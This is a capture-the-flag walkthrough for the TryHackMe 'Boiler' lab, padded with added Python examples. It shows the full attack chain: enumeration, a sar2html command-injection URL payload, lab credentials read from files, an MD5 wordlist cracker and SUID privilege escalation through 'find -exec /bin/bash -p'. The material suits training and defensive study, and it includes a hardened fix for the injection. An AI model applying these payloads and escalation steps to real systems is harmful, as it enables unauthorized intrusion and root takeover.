Boiler CTF — TryHackMe — Writeup
Hello. I’m Rahmos. Here is my Boiler CTF — TryHackMe — Writeup. Check it out!
First, deploy the machine and run nmap to find open ports:
nmap -sV -p- -v -T4 <ip>
There are 4 open ports: 21 (FTP), 80 (Apache), 10000 (Webmin), 55007 (SSH).
Unfortunately, Webmin is running version 1.930, the newest release at the time of writing, so there is no known exploit to use against it.
First, log in to FTP as anonymous and look around for files:
There is a hidden .txt file (.info.txt).
Read the content of the file:
get .info.txt -
**Remember to add the “-” at the end: it makes ftp write the file to stdout, so you can read it directly without transferring it to your machine.
It’s ROT13-encoded. Let’s decode it:
Well, still nothing valuable 😣 So I guess that’s everything FTP has to offer.
As port 80 (HTTP) is open, let’s visit the website.
It’s the default Apache page. I checked the page source (Ctrl+U), but found nothing valuable. So let’s move on to finding hidden directories with gobuster
gobuster dir -u <ip>:80 -w /path-to-wordlist
robots.txt exists, so just read it:
You’ll see a string of decimal numbers. Decode it from decimal and then from Base64; I will use icyberchef.io:
Put the decoded string into hashid:
hashid says it’s MD5. MD5 is a one-way hash, so it isn’t “decrypted”: lookup sites simply compare it against tables of precomputed hashes of common words. I’ll use this one: https://www.dcode.fr/md5-hash
I got the string: kidding. So far I don’t know what it’s used for, so I’ll leave it for now.
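The decimal -> Base64 -> MD5-lookup chain above (and the ROT13 note from FTP) done in code rather than by hand in CyberChef, dcode and hashid. This is an added example, not part of the original writeup: the sample blob is constructed here from md5("kidding") so it has the same shape as the real robots.txt value, and the wordlist is a tiny stand-in for a rainbow table. The point of crack_md5 is that MD5 is never reversed, only matched against hashed candidates.

```python
import base64
import codecs
import hashlib
import re
from typing import Iterable, Optional


def rot13(text: str) -> str:
    """ROT13 is its own inverse, so the same call encodes and decodes."""
    return codecs.decode(text, "rot_13")


def decimal_to_bytes(blob: str) -> bytes:
    """Turn a run of whitespace-separated decimal byte values into bytes."""
    values = [int(tok) for tok in blob.split()]
    if any(not 0 <= v <= 255 for v in values):
        raise ValueError("decimal token outside the byte range 0-255")
    return bytes(values)


def decode_robots_blob(blob: str) -> str:
    """Decimal -> raw bytes -> Base64 decode, the two CyberChef steps."""
    raw = decimal_to_bytes(blob)
    return base64.b64decode(raw, validate=True).decode("ascii")


def looks_like_md5(candidate: str) -> bool:
    """hashid's reasoning reduced to what matters here: 32 hex characters."""
    return re.fullmatch(r"[0-9a-fA-F]{32}", candidate) is not None


def crack_md5(digest: str, wordlist: Iterable[str]) -> Optional[str]:
    """What an online 'MD5 decrypt' site actually does: hash every candidate
    word and compare digests. Nothing is decrypted; a preimage is looked up."""
    target = digest.lower()
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == target:
            return word
    return None


def decode_chain(blob: str, wordlist: Iterable[str]) -> Optional[str]:
    """Full pipeline: decimal -> Base64 -> MD5 lookup."""
    stage = decode_robots_blob(blob)
    if not looks_like_md5(stage):
        raise ValueError(f"decoded value is not an MD5 digest: {stage!r}")
    return crack_md5(stage, wordlist)


# Constructed sample input (not the real robots.txt contents): built from
# md5("kidding") so it has the same shape as the blob on the target.
SAMPLE_BLOB = " ".join(
    str(b) for b in base64.b64encode(hashlib.md5(b"kidding").hexdigest().encode())
)
# Tiny constructed wordlist standing in for a rainbow table or rockyou.txt.
WORDLIST = ["password", "admin", "boiler", "joomla", "kidding"]

if __name__ == "__main__":
    print(rot13("Uryyb"))                       # Hello
    print(decode_chain(SAMPLE_BLOB, WORDLIST))  # kidding
```

Swap WORDLIST for a real dictionary and the same loop is a working offline cracker for any unsalted MD5 you pull out of a robots.txt or config file.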
Next, access /joomla
So now I know the website is running the Joomla CMS.
Again, scan for hidden directories, but this time starting from /joomla
gobuster dir -u http://<ip>:80/joomla -w /path-to-wordlist
Let’s access /_files
Decode it:
Well, nothing valuable again…
Next, /~www
Nothing.
Next, /_archive:
Still nothing.
Next, /_database
Decode:
“Time command spring”. No meaning!
Next, /_test
There’s something about sar2html. A quick Google search turned up:
Not only the description, but also a remote code execution exploit: https://www.exploit-db.com/exploits/47204
The plot parameter is passed straight to a shell, so let’s try a basic command first:
http://<ip>/joomla/_test/index.php?plot=;ls%20-al
It works!! There is a log.txt file. Let’s read it by changing the command to cat log.txt
Now I’ve got the credential for SSH:
basterd : superduperp@$$
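The sar2html bug above is plain OS command injection: whatever arrives in plot is pasted into a shell command line, so a leading ; ends the intended command and starts ours. This added example (not the sar2html code, which is PHP, and not from the original writeup) reproduces the bug class in Python with a harmless echo standing in for the server-side command, and shows the two fixes that close it: an allow-list on the parameter, and argv-style execution with no shell at all.

```python
import re
import subprocess

# Hypothetical stand-in for the server-side command; "echo" keeps the demo
# harmless. The real sar2html PHP is not reproduced here.
BASE_CMD = "echo plotting"


def vulnerable_plot(plot: str) -> str:
    """The bug class: untrusted input concatenated into a shell command line.
    shell=True hands the string to /bin/sh, so ';ls -al' runs as a second
    command, exactly like ?plot=;ls%20-al on the target."""
    result = subprocess.run(
        f"{BASE_CMD} {plot}", shell=True, capture_output=True, text=True
    )
    return result.stdout


# Allow-list: hostnames / file stems only, no shell metacharacters or slashes.
PLOT_RE = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")


def hardened_plot(plot: str) -> str:
    """Two fixes together: reject anything outside the allow-list, and pass
    the value as a separate argv element with no shell, so even a value that
    slipped through would never be interpreted as shell syntax."""
    if not PLOT_RE.fullmatch(plot):
        raise ValueError(f"rejected plot parameter: {plot!r}")
    result = subprocess.run(
        ["echo", "plotting", plot], shell=False, capture_output=True, text=True
    )
    return result.stdout


def is_rejected(plot: str) -> bool:
    """True if the hardened version refuses the value."""
    try:
        hardened_plot(plot)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    payload = ";echo INJECTED"
    print(vulnerable_plot(payload), end="")   # second line proves the injection ran
    print(hardened_plot("host1"), end="")     # plotting host1
    print("hardened rejects payload:", is_rejected(payload))
```

Either fix alone helps; together they give defence in depth. Note that escaping with shlex.quote while keeping shell=True is a weaker third option, because a single forgotten call anywhere reopens the hole.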
So what next? Let’s log in over SSH with the credential above!
ssh -p 55007 basterd@<ip>
** The -p flag sets the SSH port to 55007; without it, SSH uses the default port 22.
Now I’m into the machine!
Let’s spawn a bash shell with Python’s pty (over SSH you already have a proper TTY, so this step is optional here, but it’s a good habit for reverse shells):
python -c 'import pty; pty.spawn("/bin/bash")'
List the files in the home directory:
The other user’s password is stored in backup.sh. Let’s read its content:
**Note: you can read it directly with cat, or transfer it to your machine with scp and read it there.
In case you choose scp, here is the command:
scp backup.sh your-user-name@<your-VPN-ip>:/home/your-user-name
Now I know another credential:
stoner : superduperp@$$no1knows
Let’s SSH as stoner:
ssh -p 55007 stoner@<ip>
Now I’m stoner. Look around and read files:
The content of .secret is your user.txt flag!
Next, I’ll find a way to own root and get the final flag.
First, I use find to search for files with the SUID bit set:
find / -perm -u=s 2>/dev/null
So find itself has the SUID bit set. I’ll use find itself for privilege escalation!
find . -exec /bin/bash -p \; -quit
find can execute another command via -exec, so I use it to run /bin/bash. Because find is SUID root, bash is started with an effective UID of 0. Bash normally resets its effective UID back to the real UID at startup; the -p (privileged) flag stops it doing that, so the shell stays root.
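The SUID hunt above, as an added example that is not from the original writeup: the same search as find / -perm -u=s, but done with os.walk and lstat so unreadable directories and symlinks are handled, plus a triage step that flags binaries known to spawn a shell when SUID root (the set below is a small assumed subset of the GTFOBins list). The fixture directory is constructed in code so the example runs offline; on a real target you would call find_suid_files("/") and also check that st_uid is 0.

```python
import os
import stat
import tempfile
from typing import List

# Assumption: a small subset of the binaries GTFOBins lists as able to give
# a shell when SUID root (https://gtfobins.github.io/). Extend as needed.
SHELL_CAPABLE = {
    "find", "bash", "sh", "vim", "vi", "python", "python3", "perl",
    "env", "nmap", "less", "more", "awk", "gawk",
}


def find_suid_files(root: str, root_owned_only: bool = False) -> List[str]:
    """Equivalent of `find ROOT -perm -u=s -type f 2>/dev/null`: regular files
    whose SUID bit is set. lstat skips symlink targets, and unreadable
    directories are ignored instead of aborting the walk."""
    hits: List[str] = []
    for dirpath, _dirs, filenames in os.walk(root, onerror=lambda _e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode) or not st.st_mode & stat.S_ISUID:
                continue
            if root_owned_only and st.st_uid != 0:
                continue
            hits.append(path)
    return sorted(hits)


def triage(paths: List[str]) -> List[str]:
    """Keep only SUID files whose basename is a known shell-capable binary;
    on Boiler this is where /usr/bin/find would stand out."""
    return [p for p in paths if os.path.basename(p) in SHELL_CAPABLE]


def basenames(paths: List[str]) -> List[str]:
    return [os.path.basename(p) for p in paths]


def make_demo_tree() -> str:
    """Constructed fixture (not a real filesystem): a temp dir holding a fake
    SUID 'find' and a plain 'cat', so the walk has something to report."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    bin_dir = os.path.join(root, "usr", "bin")
    os.makedirs(bin_dir)
    for name, mode in (("find", 0o4755), ("cat", 0o755)):
        path = os.path.join(bin_dir, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)  # setting SUID on your own file needs no privilege
    return root


if __name__ == "__main__":
    demo_root = make_demo_tree()
    suid = find_suid_files(demo_root)
    print("SUID files:", suid)
    print("worth a look:", triage(suid))   # the fake 'find'
```

triage only narrows the list; a hit still has to be confirmed by hand (owner root, not mounted nosuid, and a working GTFOBins recipe such as the -exec /bin/bash -p trick above).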
Get the final flag: root.txt
The end.
HAPPY HACKING